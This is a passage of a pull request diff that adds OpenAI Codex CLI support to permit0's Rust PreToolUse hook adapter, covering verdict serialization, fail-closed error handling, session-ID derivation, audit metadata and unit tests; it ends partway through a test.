### PR TITLE
Codex CLI integration: hook adapter, integration folder, and managed-prefs hardening

### DIFF
--- a/crates/permit0-cli/src/cmd/hook.rs
+++ b/crates/permit0-cli/src/cmd/hook.rs
@@ -1,18 +1,42 @@
 #![forbid(unsafe_code)]
 
-//! Claude Code PreToolUse hook adapter.
+//! PreToolUse hook adapter for multiple agent runtimes.
 //!
-//! Claude Code invokes hooks with a JSON payload on stdin describing
-//! the tool call. The hook responds with a JSON object:
+//! Reads a JSON tool-call payload on stdin and emits a verdict to
+//! stdout. The exact wire format depends on which agent runtime
+//! invoked the hook (see [`ClientKind`] for prefix stripping and
+//! [`OutputFormat`] for output serialization):
 //!
-//! - `{ "decision": "allow" }` — permit the tool call
-//! - `{ "decision": "block", "reason": "..." }` — deny the tool call
-//! - `{ "decision": "ask_user", "message": "..." }` — human-in-the-loop
+//! - **Claude Code, Claude Desktop, OpenClaw, Raw**: emit a
+//!   `hookSpecificOutput` envelope with
+//!   `permissionDecision: "allow" | "deny" | "ask"` (or no
+//!   `permissionDecision` for "defer to native flow").
+//! - **OpenAI Codex CLI**: emit **empty stdout** for "no objection"
+//!   (Codex explicitly rejects an `allow` envelope and would fail
+//!   open with a warning if we sent one) or a deny envelope for
+//!   blocks. Codex `PreToolUse` has no `ask` verdict; HITL maps to
+//!   deny with a "requires human review" marker so users can
+//!   distinguish it from a hard block.
+//!
+//! ## Fail-closed semantics
+//!
+//! Codex treats a non-zero exit, malformed stdout, or any output
+//! containing `permissionDecision: "allow"` as **fail-open** — the
+//! tool runs anyway. The Codex path of [`run`] catches every
+//! recoverable error from the inner pipeline and converts it to a
+//! structured deny envelope so an internal permit0 failure never
+//! silently allows a governed action.
 //!
 //! ## Session-Aware Mode
 //!
-//! When `--db` is provided, the hook persists session context to SQLite,
-//! enabling cross-invocation pattern detection (velocity, attack chains).
+//! When `--db` is provided, the hook persists session context to
+//! SQLite, enabling cross-invocation pattern detection (velocity,
+//! attack chains). The session ID is derived from the explicit
+//! `--session-id` flag, then the client-specific source
+//! (`CLAUDE_SESSION_ID` for Claude Code; stdin payload `session_id` →
+//! `CODEX_THREAD_ID` env for Codex), then the PPID fallback. Remote
+//! mode (`--remote`) is stateless for session history in v1 — the
+//! daemon is the source of truth for evaluation.
 //!
 //! ```json
 //! {
@@ -61,6 +85,11 @@ pub enum ClientKind {
     /// boundary. Strip the leading `<server>.` so normalizers can match
     /// the bare tool name.
     OpenClaw,
+    /// OpenAI Codex CLI. Uses the same `mcp__<server>__<tool>` prefixing
+    /// as Claude Code. Selecting this client also switches verdict
+    /// serialization to Codex's `PreToolUse` envelope (see
+    /// [`OutputFormat`]).
+    Codex,
     /// No prefix stripping at all. Use this when you're calling the hook
     /// directly (e.g. from tests or a custom integration that already
     /// hands you the bare tool name).
@@ -72,9 +101,10 @@ impl ClientKind {
     /// name normalizers expect.
     pub fn strip_prefix(self, tool_name: &str) -> &str {
         match self {
-            // Claude Code: "mcp__<server>__<tool>" — first "__" after
-            // "mcp__" separates server from tool.
-            Self::ClaudeCode => tool_name
+            // Claude Code and Codex share the MCP convention:
+            // "mcp__<server>__<tool>" — first "__" after "mcp__"
+            // separates server from tool.
+            Self::ClaudeCode | Self::Codex => tool_name
                 .strip_prefix("mcp__")
                 .and_then(|rest| rest.split_once("__").map(|(_, tool)| tool))
                 .unwrap_or(tool_name),
@@ -99,10 +129,50 @@ impl FromStr for ClientKind {
             "claude-code" | "claude_code" => Ok(Self::ClaudeCode),
             "claude-desktop" | "claude_desktop" => Ok(Self::ClaudeDesktop),
             "openclaw" | "open-claw" | "open_claw" => Ok(Self::OpenClaw),
+            "codex" | "codex-cli" | "codex_cli" => Ok(Self::Codex),
             "raw" | "none" => Ok(Self::Raw),
             other => Err(format!(
-                "unknown client '{other}' (supported: claude-code, claude-desktop, openclaw, raw)"
+                "unknown client '{other}' (supported: claude-code, claude-desktop, \
+                 openclaw, codex, raw)"
             )),
+        }
+    }
+}
+
+/// Wire format used to serialize the hook's verdict to stdout.
+///
+/// Different agent runtimes interpret hook responses differently:
+/// - Claude Code expects a `hookSpecificOutput` envelope with
+///   `permissionDecision: "allow" | "deny" | "ask"`, or no
+///   `permissionDecision` for "defer to native flow".
+/// - Codex expects **empty stdout** for "allow" / "no objection"
+///   (an `allow` envelope is explicitly rejected and causes Codex to
+///   fail open with a warning), and a `hookSpecificOutput` envelope
+///   with `permissionDecision: "deny"` for blocks. Codex has no `ask`
+///   verdict in `PreToolUse`; HITL is mapped to `deny` with an
+///   informative reason.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum OutputFormat {
+    /// Claude Code envelope. Used by Claude Code, Claude Desktop,
+    /// OpenClaw, and the `Raw` client (which all consume the same
+    /// `hookSpecificOutput` schema).
+    ClaudeCode,
+    /// OpenAI Codex `PreToolUse` envelope. Empty stdout = no objection;
+    /// any other stdout must be a deny envelope.
+    Codex,
+}
+
+impl OutputFormat {
+    /// Pick the wire output format for a given client. Adding a new
+    /// `ClientKind` requires a deliberate decision here — exhaustive
+    /// matching makes that mandatory.
+    pub fn from_client(client: ClientKind) -> Self {
+        match client {
+            ClientKind::Codex => Self::Codex,
+            ClientKind::ClaudeCode
+            | ClientKind::ClaudeDesktop
+            | ClientKind::OpenClaw
+            | ClientKind::Raw => Self::ClaudeCode,
         }
     }
 }
@@ -119,22 +189,34 @@ impl FromStr for ClientKind {
 ///
 /// Allowlist / denylist hits on unknown tool names continue to apply — those
 /// are explicit operator decisions and aren't rewritten by `--unknown`.
+///
+/// The wire shape each variant produces depends on [`OutputFormat`]:
+/// - Claude Code emits the standard `hookSpecificOutput` envelope.
+/// - Codex emits empty stdout for "no objection" (Allow / Defer) and a
+///   deny envelope for blocking verdicts (Ask is mapped to deny since
+///   Codex `PreToolUse` has no `ask`).
 #[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
 pub enum UnknownMode {
-    /// Emit `permissionDecision: "ask"` with permit0's reasoning. The user
-    /// is prompted via Claude Code's UI before the tool runs.
+    /// Prompt the user with permit0's reasoning before the tool runs.
+    /// On Claude Code this is `permissionDecision: "ask"` (native ask
+    /// UI); on Codex this becomes a deny envelope with the
+    /// "requires human review" marker since Codex `PreToolUse` has no
+    /// `ask` verdict.
     Ask,
-    /// Emit `permissionDecision: "allow"` — the tool runs unprompted.
-    /// Sharp edge: blanket‑allows anything permit0 doesn't recognize.
+    /// Let the tool run unprompted. On Claude Code this is
+    /// `permissionDecision: "allow"`; on Codex this is empty stdout
+    /// (Codex explicitly rejects an `allow` envelope). Sharp edge:
+    /// blanket‑allows anything permit0 doesn't recognize.
     Allow,
-    /// Emit `permissionDecision: "deny"` with a generic reason — the tool
-    /// is blocked. Use for whitelist‑only setups where every governed action
-    /// must be packaged.
+    /// Block the tool. Deny envelope on every client. Use for
+    /// whitelist‑only setups where every governed action must be
+    /// packaged.
     Deny,
-    /// Emit a hook output with **no** `permissionDecision`, letting Claude
-    /// Code's own permission flow take over (settings allowlists, then its
-    /// native ask UI). Default — permit0 only intervenes for tools it has
-    /// packs for.
+    /// Fall through to the client's native flow. On Claude Code this is
+    /// an envelope with no `permissionDecision` (so Claude's own
+    /// allowlists / ask UI take over); on Codex this is empty stdout
+    /// (no objection — Codex continues with its default flow). Default
+    /// — permit0 only intervenes for tools it has packs for.
     #[default]
     Defer,
 }
@@ -154,15 +236,53 @@ impl FromStr for UnknownMode {
     }
 }
 
-/// Claude Code hook input format.
+/// PreToolUse hook input format.
 ///
-/// Claude Code passes the tool name and input as JSON.
+/// Accepts the union of:
+/// - Claude Code's minimal payload (`tool_name` + `tool_input`)
+/// - Codex's extended payload (adds `session_id`, `turn_id`, `cwd`,
+///   `hook_event_name`, `model`, `tool_use_id`, `transcript_path`)
+///
+/// All Codex-specific fields are optional with `#[serde(default)]`, so
+/// the same struct deserializes both formats. Empty-string values from
+/// Codex are treated as equivalent to missing fields: downstream
+/// consumers must apply `.filter(|s| !s.is_empty())` before acting on
+/// any optional string field.
 #[derive(Debug, Deserialize)]
 pub struct HookInput {
-    /// The tool name (e.g. "Bash", "Write", "Edit").
+    /// The tool name (e.g. "Bash", "Write", "Edit", or an MCP-prefixed
+    /// name like `mcp__permit0-gmail__gmail_send`).
     pub tool_name: String,
     /// The tool input parameters.
     pub tool_input: serde_json::Value,
+    /// Codex thread/session UUID. Primary automatic source for the
+    /// permit0 session ID when `--client codex` is set.
+    #[serde(default)]
+    pub session_id: Option<String>,
+    /// Codex turn identifier within a thread. Captured for forward-compat;
+    /// not currently consumed by permit0.
+    #[serde(default)]
+    pub turn_id: Option<String>,
+    /// Codex working directory at the time of the tool call. Captured for
+    /// forward-compat; not currently consumed by permit0.
+    #[serde(default)]
+    pub cwd: Option<String>,
+    /// Codex hook event name (always `"PreToolUse"` for this hook). Captured
+    /// for forward-compat; not currently consumed by permit0.
+    #[serde(default)]
+    pub hook_event_name: Option<String>,
+    /// Codex model slug. Captured for forward-compat; not currently
+    /// consumed by permit0.
+    #[serde(default)]
+    pub model: Option<String>,
+    /// Codex per-call invocation ID. Captured for forward-compat; not
+    /// currently consumed by permit0.
+    #[serde(default)]
+    pub tool_use_id: Option<String>,
+    /// Codex JSONL transcript path. Captured for forward-compat; not
+    /// currently consumed by permit0.
+    #[serde(default)]
+    pub transcript_path: Option<String>,
 }
 
 /// Claude Code PreToolUse hook output. Schema per
@@ -244,19 +364,139 @@ impl HookOutput {
     }
 }
 
-/// Derive session ID from available sources.
-fn derive_session_id(explicit: Option<String>) -> String {
-    // 1. Explicit --session-id flag
-    if let Some(id) = explicit {
-        return id;
-    }
-    // 2. CLAUDE_SESSION_ID environment variable
-    if let Ok(id) = std::env::var("CLAUDE_SESSION_ID") {
-        if !id.is_empty() {
-            return id;
+/// Serialize a Codex `PreToolUse` deny envelope with the given reason.
+///
+/// Codex `PreToolUse` accepts only `permissionDecision: "deny"` (or no
+/// objection via empty stdout). All Codex hook outputs that are not
+/// "no objection" must be emitted through this helper.
+fn codex_deny_envelope(reason: &str) -> String {
+    // Static string keys + a single string value never hit any
+    // serde_json failure path, so the expect is structurally
+    // guaranteed. We still go through serde_json (rather than format!)
+    // to get correct JSON escaping of the reason text.
+    serde_json::to_string(&serde_json::json!({
+        "hookSpecificOutput": {
+            "hookEventName": "PreToolUse",
+            "permissionDecision": "deny",
+            "permissionDecisionReason": reason,
+        }
+    }))
+    .expect("serializing a static-keyed JSON object cannot fail")
+}
+
+/// Test-only helper: convert a `Permission` directly into Codex stdout
+/// output.
+///
+/// Production code never has a bare `Permission` at the emit boundary;
+/// it always has a [`HookOutput`] (after unknown-policy and shadow
+/// rewrites), so it uses [`hook_output_to_codex`] instead. This helper
+/// exists so the per-`Permission` mapping table is testable in isolation
+/// and must stay consistent with `hook_output_to_codex`'s mapping —
+/// both apply [`CODEX_HITL_MARKER`] for `HumanInTheLoop`.
+///
+/// Returns `None` for `Permission::Allow` (Codex requires empty stdout
+/// for "no objection"; an `allow` envelope is explicitly rejected).
+/// Returns `Some(envelope)` for `Deny` and `HumanInTheLoop` (HITL maps
+/// to deny with the marker because Codex `PreToolUse` has no `ask`).
+#[cfg(test)]
+fn codex_output(perm: Permission, reason: &str) -> Option<String> {
+    match perm {
+        Permission::Allow => None,
+        Permission::Deny => Some(codex_deny_envelope(reason)),
+        Permission::HumanInTheLoop => {
+            Some(codex_deny_envelope(&format!("{reason}{CODEX_HITL_MARKER}")))
         }
     }
-    // 3. PPID (parent process ID — stable within a Claude Code conversation)
+}
+
+/// Marker appended to HITL→deny reasons under Codex so users can tell
+/// "blocked because Codex has no `ask`" apart from "blocked because the
+/// action is Critical / on a denylist". Without this, every Codex deny
+/// envelope looks the same shape and operators have no signal about
+/// what to do (e.g. add to allowlist vs. abort the task).
+const CODEX_HITL_MARKER: &str = " — requires human review";
+
+/// Convert a finalized [`HookOutput`] into Codex stdout output.
+///
+/// This is the runtime counterpart to [`codex_output`]: it operates on
+/// the same `HookOutput` shape used by every other code path (unknown
+/// policy rewrites, remote response mapping, remote error mapping,
+/// shadow mode), so converting at the very end of the pipeline avoids
+/// duplicating the rewrite logic.
+///
+/// Returns `None` when Codex should see empty stdout:
+/// - `Some("allow")` → no objection, empty stdout (Codex rejects the
+///   `allow` envelope).
+/// - `None` (deferred) → no objection, empty stdout (Codex falls through
+///   to its native flow naturally).
+///
+/// Returns `Some(envelope)` for any blocking verdict:
+/// - `Some("deny")` → deny envelope with the existing reason (or a
+///   generic fallback).
+/// - `Some("ask")` → deny envelope with [`CODEX_HITL_MARKER`] appended
+///   (Codex has no `ask`; the marker tells users this would have been
+///   a HITL prompt under Claude Code, not a hard block).
+/// - Any other `Some(...)` value (defensive against future Claude Code
+///   verdict additions) → deny envelope flagging the unexpected value.
+fn hook_output_to_codex(output: &HookOutput) -> Option<String> {
+    match output.hook_specific_output.permission_decision {
+        Some("allow") | None => None,
+        Some("deny") => Some(codex_deny_envelope(
+            output
+                .hook_specific_output
+                .permission_decision_reason
+                .as_deref()
+                .unwrap_or("permit0 denied"),
+        )),
+        Some("ask") => {
+            // Always end the reason with the HITL marker so Codex users
+            // can distinguish "would have been a Claude Code approval
+            // prompt" from "Critical-tier hard block".
+            let reason = match output
+                .hook_specific_output
+                .permission_decision_reason
+                .as_deref()
+            {
+                Some(r) => format!("{r}{CODEX_HITL_MARKER}"),
+                // Without an existing reason, emit the marker as the
+                // full message without the leading separator.
+                None => "permit0: requires human review".to_string(),
+            };
+            Some(codex_deny_envelope(&reason))
+        }
+        Some(other) => Some(codex_deny_envelope(&format!(
+            "permit0: unexpected decision '{other}'"
+        ))),
+    }
+}
+
+/// Write a finalized [`HookOutput`] to stdout in the requested format.
+///
+/// For `ClaudeCode`, serializes the full envelope. For `Codex`, emits
+/// either the deny envelope (for blocking verdicts) or zero bytes (for
+/// allow / defer). The Codex empty-stdout case must NOT call
+/// `println!("")` — that would write a trailing newline byte and may
+/// trigger Codex's invalid-JSON warning path. We skip the write entirely.
+fn emit_hook_output(format: OutputFormat, output: &HookOutput) -> Result<()> {
+    match format {
+        OutputFormat::ClaudeCode => {
+            println!("{}", serde_json::to_string(output)?);
+        }
+        OutputFormat::Codex => {
+            if let Some(json) = hook_output_to_codex(output) {
+                println!("{json}");
+            }
+        }
+    }
+    Ok(())
+}
+
+/// PPID / cwd hash fallback for session ID derivation. Common to every
+/// `ClientKind` and used as the last resort when no explicit flag, no
+/// stdin payload field, and no client-specific env var has supplied an
+/// ID. Stable within a single agent conversation under Unix; on
+/// Windows we fall back to a cwd hash since PPID isn't portable here.
+fn ppid_fallback() -> String {
     #[cfg(unix)]
     {
         let ppid = std::os::unix::process::parent_id();
@@ -264,12 +504,25 @@ fn derive_session_id(explicit: Option<String>) -> String {
     }
     #[cfg(not(unix))]
     {
-        // 4. Fallback: hash of current working directory
         let cwd = std::env::current_dir()
             .map(|p| p.display().to_string())
             .unwrap_or_else(|_| "unknown".into());
         format!("cwd-{:x}", fxhash(&cwd))
     }
+}
+
+/// Derive session ID for the Claude Code path: explicit flag, then
+/// `CLAUDE_SESSION_ID` env var, then PPID/cwd fallback.
+fn derive_session_id(explicit: Option<String>) -> String {
+    if let Some(id) = explicit {
+        return id;
+    }
+    if let Ok(id) = std::env::var("CLAUDE_SESSION_ID") {
+        if !id.is_empty() {
+            return id;
+        }
+    }
+    ppid_fallback()
 }
 
 #[cfg(not(unix))]
@@ -279,6 +532,87 @@ fn fxhash(s: &str) -> u64 {
         h = h.wrapping_mul(0x100000001b3).wrapping_add(b as u64);
     }
     h
+}
+
+/// Forward the Codex stdin context fields into `RawToolCall.metadata`.
+///
+/// permit0's audit pipeline serializes every `RawToolCall` (including
+/// `metadata`) into its audit records and dashboard view, so forwarding
+/// the Codex thread / turn / model identity makes decisions correlatable
+/// with the originating Codex session after the fact. Empty-string
+/// values from Codex are dropped so a payload like `"transcript_path":
+/// ""` does not pollute the audit record. Claude Code's minimal payload
+/// produces an empty map (no behavior change vs. the legacy default).
+///
+/// **Local mode only**: `evaluate_remote_with_meta` POSTs only
+/// `tool_name` and `parameters` to the daemon, so this metadata
+/// surfaces in audit records only when `--remote` is unset.
+/// `docs/plans/codex-integration/05-limitations.md` Section 7 scopes
+/// remote-mode metadata forwarding as v2.
+fn build_tool_call_metadata(input: &HookInput) -> serde_json::Map<String, serde_json::Value> {
+    let mut metadata = serde_json::Map::new();
+    let pairs: [(&str, &Option<String>); 7] = [
+        ("session_id", &input.session_id),
+        ("turn_id", &input.turn_id),
+        ("cwd", &input.cwd),
+        ("hook_event_name", &input.hook_event_name),
+        ("model", &input.model),
+        ("tool_use_id", &input.tool_use_id),
+        ("transcript_path", &input.transcript_path),
+    ];
+    for (key, value) in pairs {
+        if let Some(v) = value.as_deref().filter(|s| !s.is_empty()) {
+            metadata.insert(key.to_string(), serde_json::Value::String(v.to_string()));
+        }
+    }
+    metadata
+}
+
+/// Derive a session ID using format-specific sources.
+///
+/// Priority for Codex:
+/// 1. Explicit `--session-id` flag (operator override).
+/// 2. `session_id` from the stdin payload (thread UUID, most reliable
+///    automatic source).
+/// 3. `CODEX_THREAD_ID` environment variable (Codex injects this into
+///    shell tool processes).
+/// 4. PPID / cwd hash fallback ([`ppid_fallback`]).
+///
+/// Priority for Claude Code:
+/// 1. Explicit `--session-id` flag.
+/// 2. `CLAUDE_SESSION_ID` environment variable.
+/// 3. PPID / cwd hash fallback.
+///
+/// **The Codex branch deliberately does not consult `CLAUDE_SESSION_ID`.**
+/// In a developer environment where both Claude Code and Codex are
+/// configured side-by-side, a stale `CLAUDE_SESSION_ID` exported from a
+/// prior shell wrapper could otherwise cross-contaminate Codex's
+/// session ID and fragment cross-call pattern detection. Empty strings
+/// from the stdin payload or env vars are treated as absent so a Codex
+/// payload with `"session_id": ""` does not poison the session store.
+fn derive_session_id_for_format(
+    format: OutputFormat,
+    stdin_session_id: Option<String>,
+    explicit_flag: Option<String>,
+) -> String {
+    if let Some(id) = explicit_flag.filter(|s| !s.is_empty()) {
+        return id;
+    }
+    match format {
+        OutputFormat::Codex => {
+            if let Some(id) = stdin_session_id.filter(|s| !s.is_empty()) {
+                return id;
+            }
+            if let Ok(id) = std::env::var("CODEX_THREAD_ID") {
+                if !id.is_empty() {
+                    return id;
+                }
+            }
+            // Skip CLAUDE_SESSION_ID — see function-level docstring.
+            ppid_fallback()
+        }
+        OutputFormat::ClaudeCode => derive_session_id(None),
+    }
 }
 
 /// Subset of `serve.rs::CheckResponse` we care about when delegating
@@ -313,6 +647,12 @@ fn build_check_endpoint(remote: &str) -> String {
 }
 
 /// Translate a remote `CheckResponse` into the Claude Code hook envelope.
+///
+/// Wire-format note: the daemon's `serve.rs::CheckResponse` serializes
+/// `Permission::HumanInTheLoop` as `"human"` (via `Display` → `"HUMAN"` →
+/// `to_lowercase()`), not `"humanintheloop"`. We accept both for safety
+/// against an older daemon that may have been deployed with a stricter
+/// mapping, but `"human"` is the canonical value.
 fn remote_response_to_hook_output(resp: &RemoteCheckResponse) -> HookOutput {
     match resp.permission.as_str() {
         "allow" => HookOutput::allow(),
@@ -321,7 +661,7 @@ fn remote_response_to_hook_output(resp: &RemoteCheckResponse) -> HookOutput {
                 .clone()
                 .unwrap_or_else(|| "permit0 denied (remote)".into()),
         ),
-        "humanintheloop" => HookOutput::ask(format!(
+        "human" | "humanintheloop" => HookOutput::ask(format!(
             "permit0: {} ({}) — risk {}/100 {}",
             resp.action_type.as_deref().unwrap_or("?"),
             resp.channel.as_deref().unwrap_or("?"),
@@ -470,12 +810,23 @@ fn evaluate_remote_with_meta(
 
 /// Run the PreToolUse hook adapter.
 ///
-/// `client` selects which MCP host calls us, controlling how tool-name
-/// prefixes are stripped before normalization. See [`ClientKind`].
+/// `client` selects which MCP host calls us, controlling both how
+/// tool-name prefixes are stripped before normalization (see
+/// [`ClientKind`]) and how verdicts are serialized to stdout (see
+/// [`OutputFormat`]).
 ///
 /// `remote` (if `Some`) delegates evaluation to a running `permit0 serve
 /// --ui` daemon at that URL; in that mode the local engine is never built
 /// and `profile` / `packs_dir` / `db_path` / `session_id` are ignored.
+///
+/// ## Codex fail-closed semantics
+///
+/// In Codex mode, a non-zero exit, malformed stdout, or missing deny
+/// envelope causes the tool to **fail open** (Codex executes the tool
+/// anyway with a warning). This wrapper catches any error from the
+/// inner pipeline and converts it into a structured Codex deny envelope
+/// so an internal permit0 failure never silently allows a governed
+/// action.
 #[allow(clippy::too_many_arguments)]
 pub fn run(
     profile: Option<String>,
@@ -485,6 +836,46 @@ pub fn run(
     packs_dir: Option<String>,
     shadow: bool,
     client: ClientKind,
+    remote: Option<String>,
+    unknown: UnknownMode,
+) -> Result<()> {
+    let format = OutputFormat::from_client(client);
+    let result = run_inner(
+        profile, org_domain, db_path, session_id, packs_dir, shadow, client, format, remote,
+        unknown,
+    );
+    match (format, result) {
+        (_, Ok(())) => Ok(()),
+        // Claude Code treats a non-zero exit as "hook failed" and prompts
+        // the user. That's the existing behavior — propagate the error.
+        (OutputFormat::ClaudeCode, Err(e)) => Err(e),
+        // Codex treats a non-zero exit as "hook failed → tool runs". We
+        // must never bubble Err out in that mode. Convert the error into
+        // a structured deny envelope so Codex blocks the tool.
+        (OutputFormat::Codex, Err(e)) => {
+            eprintln!("permit0 codex hook error: {e}");
+            println!(
+                "{}",
+                codex_deny_envelope(&format!("permit0 internal error: {e}"))
+            );
+            Ok(())
+        }
+    }
+}
+
+/// Inner pipeline: read stdin, evaluate, emit. Returns `Err` on any
+/// recoverable failure; the outer [`run`] wraps the Codex path so those
+/// errors cannot fail open.
+#[allow(clippy::too_many_arguments)]
+fn run_inner(
+    profile: Option<String>,
+    org_domain: &str,
+    db_path: Option<String>,
+    session_id: Option<String>,
+    packs_dir: Option<String>,
+    shadow: bool,
+    client: ClientKind,
+    format: OutputFormat,
     remote: Option<String>,
     unknown: UnknownMode,
 ) -> Result<()> {
@@ -498,11 +889,16 @@ pub fn run(
     let hook_input: HookInput = serde_json::from_str(&buf).context("parsing hook input JSON")?;
 
     // Strip the host-specific MCP prefix (if any) so YAML normalizers can
-    // match the bare tool name. See `ClientKind::strip_prefix`.
+    // match the bare tool name. See `ClientKind::strip_prefix`. We pull
+    // `session_id` out and build the audit metadata before the partial
+    // move into RawToolCall so the local-mode session derivation and
+    // metadata helper can both still read `hook_input` by reference.
+    let stdin_session_id = hook_input.session_id.clone();
+    let metadata = build_tool_call_metadata(&hook_input);
     let tool_call = RawToolCall {
         tool_name: client.strip_prefix(&hook_input.tool_name).to_string(),
         parameters: hook_input.tool_input,
-        metadata: Default::default(),
+        metadata,
     };
 
     // Remote mode short-circuits the local pipeline. Profile / packs_dir /
@@ -537,7 +933,7 @@ pub fn run(
         } else {
             output
         };
-        println!("{}", serde_json::to_string(&final_output)?);
+        emit_hook_output(format, &final_output)?;
         return Ok(());
     }
 
@@ -563,9 +959,9 @@ pub fn run(
         None => None,
     };
 
-    let session_id_str = session_store
-        .as_ref()
-        .map(|_| derive_session_id(session_id));
+    let session_id_str = session_store.as_ref().map(|_| {
+        derive_session_id_for_format(format, stdin_session_id.clone(), session_id.clone())
+    });
     let session_ctx = session_id_str.as_ref().and_then(|sid| {
         session_store
             .as_ref()
@@ -607,50 +1003,45 @@ pub fn run(
         store.record_action(sid, &record);
     }
 
-    // Resolve to Claude Code's permissionDecision values:
-    //   allow  → tool runs unprompted
-    //   deny   → tool blocked, reason shown to user/agent
-    //   ask    → user prompted; their choice routes the call
-    //   defer  → fall through to next hook / default behavior
-    let (decision_label, reason): (&'static str, String) = match result.permission {
-        Permission::Allow => ("allow", String::new()),
-        Permission::Deny => (
-            "deny",
+    // Build the base hook output from permit0's verdict directly. We
+    // match exhaustively on `result.permission` (rather than going
+    // through an intermediate string label) so the compiler enforces
+    // every variant is handled. A wildcard `_ => HookOutput::allow()`
+    // arm here would silently fail open under Codex (where empty stdout
+    // means "no objection") if a future `Permission` variant ever
+    // reached this site.
+    //
+    // The `--unknown` policy fires only for unknown→ask and rewrites
+    // `output` accordingly. Shadow mode observes the post-policy
+    // decision so logs reflect what the user would see if shadow were
+    // removed.
+    let base_output = match result.permission {
+        Permission::Allow => HookOutput::allow(),
+        Permission::Deny => HookOutput::deny(
             result
                 .risk_score
                 .as_ref()
                 .and_then(|s| s.block_reason.clone())
                 .unwrap_or_else(|| format!("permit0 denied: {:?}", result.source)),
         ),
-        Permission::HumanInTheLoop => (
-            "ask",
-            format!(
-                "permit0: {} ({}) — risk {}/100 {:?}",
-                result.norm_action.action_type.as_action_str(),
-                result.norm_action.channel,
-                result.risk_score.as_ref().map_or(0, |s| s.score),
-                result
-                    .risk_score
-                    .as_ref()
-                    .map_or(permit0_types::Tier::Medium, |s| s.tier),
-            ),
-        ),
-    };
-
-    // Build the base hook output from permit0's verdict, then apply the
-    // --unknown policy (which only fires for unknown→ask). Shadow mode
-    // observes the post-policy decision so logs reflect what the user
-    // would actually see when shadow is removed.
-    let base_output = match decision_label {
-        "allow" => HookOutput::allow(),
-        "deny" => HookOutput::deny(reason),
-        "ask" => HookOutput::ask(reason),
-        _ => HookOutput::allow(), // unreachable, but defensible
+        Permission::HumanInTheLoop => HookOutput::ask(format!(
+            "permit0: {} ({}) — risk {}/100 {:?}",
+            result.norm_action.action_type.as_action_str(),
+            result.norm_action.channel,
+            result.risk_score.as_ref().map_or(0, |s| s.score),
+            result
+                .risk_score
+                .as_ref()
+                .map_or(permit0_types::Tier::Medium, |s| s.tier),
+        )),
     };
     let is_unknown = result.norm_action.domain() == Domain::Unknown;
     let output = apply_unknown_policy(base_output, is_unknown, unknown);
 
-    // Shadow mode: log the would-be decision and always allow.
+    // Shadow mode: log the would-be decision and always allow. The
+    // format-aware emitter turns `HookOutput::allow()` into either the
+    // Claude allow envelope or empty stdout (Codex), so shadow + Codex
+    // is correctly silent without a separate code path.
     let final_output = if shadow {
         let (logged_decision, logged_reason) = hook_output_summary(&output);
         if logged_decision != "allow" {
@@ -668,8 +1059,7 @@ pub fn run(
         output
     };
 
-    // Write JSON response to stdout
-    println!("{}", serde_json::to_string(&final_output)?);
+    emit_hook_output(format, &final_output)?;
 
     Ok(())
 }
@@ -1201,6 +1591,37 @@ mod tests {
     }
 
     #[test]
+    fn remote_response_human_maps_to_ask() {
+        // The daemon serializes Permission::HumanInTheLoop as "human"
+        // (Display → "HUMAN" → to_lowercase()), not "humanintheloop".
+        // Pin the canonical daemon value here so a server-side rename
+        // would surface as a test failure instead of a silent
+        // "unknown permission value 'human'" reason at runtime.
+        let resp = RemoteCheckResponse {
+            permission: "human".into(),
+            action_type: Some("email.send".into()),
+            channel: Some("gmail".into()),
+            score: Some(62),
+            tier: Some("High".into()),
+            block_reason: None,
+        };
+        let out = remote_response_to_hook_output(&resp);
+        assert_eq!(out.hook_specific_output.permission_decision, Some("ask"));
+        let reason = out
+            .hook_specific_output
+            .permission_decision_reason
+            .clone()
+            .unwrap_or_default();
+        assert!(reason.contains("email.send"), "got: {reason}");
+        assert!(reason.contains("gmail"), "got: {reason}");
+        assert!(
+            !reason.contains("unknown permission value"),
+            "must NOT show 'unknown permission' for the canonical \
+             daemon value 'human', got: {reason}",
+        );
+    }
+
+    #[test]
     fn remote_response_unknown_permission_fails_safe_to_ask() {
         // If the daemon ever adds a new Permission variant we don't know
         // about, prefer surfacing it to the human over silent allow.
@@ -1242,5 +1663,637 @@ mod tests {
         assert_eq!(parsed.permission, "humanintheloop");
         assert_eq!(parsed.action_type.as_deref(), Some("email.send"));
         assert_eq!(parsed.score, Some(62));
+    }
+
+    #[test]
+    fn remote_response_parses_actual_daemon_human_shape() {
+        // The daemon's CheckResponse actually emits "human" (verified
+        // via Permission::Display → "HUMAN" → to_lowercase() in
+        // serve.rs). This pins the canonical wire shape so a future
+        // server-side change would surface here.
+        let json = r#"{
+            "permission": "human",
+            "action_type": "email.send",
+            "channel": "gmail",
+            "norm_hash": "deadbeef",
+            "score": 62,
+            "tier": "High",
+            "blocked": false,
+            "block_reason": null,
+            "source": "Scorer"
+        }"#;
+        let parsed: RemoteCheckResponse = serde_json::from_str(json).unwrap();
+        assert_eq!(parsed.permission, "human");
+        let out = remote_response_to_hook_output(&parsed);
+        assert_eq!(out.hook_specific_output.permission_decision, Some("ask"));
+    }
+
+    // ── Codex client / output format ──────────────────────────────────
+
+    #[test]
+    fn codex_client_kind_parses() {
+        assert_eq!("codex".parse::<ClientKind>().unwrap(), ClientKind::Codex);
+        assert_eq!(
+            "codex-cli".parse::<ClientKind>().unwrap(),
+            ClientKind::Codex
+        );
+        assert_eq!(
+            "codex_cli".parse::<ClientKind>().unwrap(),
+            ClientKind::Codex
+        );
+    }
+
+    #[test]
+    fn codex_client_kind_parser_is_case_sensitive() {
+        // The existing parser is case-sensitive (e.g. "claude-code"
+        // works but "Claude-Code" doesn't). Pin the same contract for
+        // the new "codex" alias so behavior is consistent.
+        assert!("Codex".parse::<ClientKind>().is_err());
+        assert!("CODEX".parse::<ClientKind>().is_err());
+    }
+
+    #[test]
+    fn codex_strips_mcp_double_underscore_prefix() {
+        // Codex shares the Claude Code MCP convention; the strip rule
+        // is identical (split on the first `__` after `mcp__`).
+        let c = ClientKind::Codex;
+        assert_eq!(
+            c.strip_prefix("mcp__permit0-gmail__gmail_send"),
+            "gmail_send"
+        );
+        assert_eq!(
+            c.strip_prefix("mcp__permit0-outlook__outlook_archive"),
+            "outlook_archive"
+        );
+        // Non-MCP names pass through.
+        assert_eq!(c.strip_prefix("Bash"), "Bash");
+        assert_eq!(c.strip_prefix("apply_patch"), "apply_patch");
+        // Codex sanitizes hyphens to underscores in some contexts; the
+        // splitter only consumes `__` so post-sanitization names still
+        // work.
+        assert_eq!(
+            c.strip_prefix("mcp__permit0_gmail__gmail_send"),
